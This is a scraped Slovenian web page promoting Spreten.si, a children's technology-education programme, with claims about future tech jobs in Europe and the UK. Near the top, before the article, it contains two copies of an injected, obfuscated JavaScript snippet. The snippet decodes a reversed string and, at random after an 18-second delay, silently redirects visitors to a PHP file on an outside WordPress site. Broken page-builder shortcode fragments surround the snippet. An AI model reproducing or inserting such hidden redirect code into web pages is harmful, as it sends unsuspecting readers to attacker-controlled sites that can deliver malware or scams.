Select Page
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” make_equal=”off” use_custom_gutter=”off” fullwidth=”off” specialty=”off” admin_label=”section” disabled=”off”]
) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tom_width=”off” width_unit=”off” custom_width_px=”1080px” custom_width_percent=”80%” use_custom_gutter=”off” gutter_width=”3″ padding_mobile=”off” allow_player_pause=”off” parallax=”off” parallax_method=”on” make_equal=”off” column_padding_mobile=”on” parallax_1=”off” parallax_method_1=”on” parallax_2=”off” parallax_method_2=”on” parallax_3=”off” parallax_method_3=”on” parallax_4=”off” parallax_method_4=”on” admin_label=”row” disabled=”off”]

Poklici prihodnosti so tehnološki

Priprava na prihodnost
Tehnološki napredek je hiter in nepredvidljiv in pogosto slišimo, da danes ne moremo vedeti, kakšna bo naša realnost že čez 10, kaj šele čez 20 let. Nekaj pa vseeno vemo.

Evropa: Ker ni primernih kadrov, je in bo v Evropi med letoma 2014 in 2020 ostalo praznih milijon delovnih mest, ki zahtevajo visoke digitalne ali tehnološke spretnosti. Zaposlovanje teh strokovnjakov sicer vztrajno raste, a če bi bilo več visoko tehnoloških kadrov, bi rastlo še hitreje, tako pa mladi drugih profilov ostajajo brezposelni. Spreten.si je program za tehnološko izobraževanje otrok.

Velika Britanija: Raziskava, kateri poklici in spretnostih bodo potrebni leta 2030 (The Future of Work: Jobs and Skills in 2030) je pokazala, da bo poklicno prihodnost krojilo 13 dejavnikov, štirje od teh pa so vezani na razvoj novih tehnologij. Tako bodo tehnološko zahtevni poklici med najbolj potrebnimi. Zato so v VB uvedli računalništvo kot obvezni predmet v vse razrede osnovne šole. V Sloveniji (Maribor) to pomanjkljivost rešuje program Spreten.si in pri tem uporablja mnoga britanska dognanja in tehnologije, npr. physical computing.

Slovenski profesor: “Ko me tehnološka podjetja prosijo za uspešne diplomante, sem v zadregi. Mnogi naši diplomanti, tudi najboljši, niso takšni tehniki, kot bi jih potrebovala podjetja. Na fakulteti ne moremo narediti tehnika iz nekoga, ki se je šele pri 18-ih začel učiti tehničnega razmišljanja. To bi se moralo zgoditi veliko prej, kot se dogaja pri glasbi, jezikih in športu.”  Spreten.si privzgaja tehnično razmišljanje od “malih nog” naprej.

Spreten.si otroke pripravlja na prihodnost!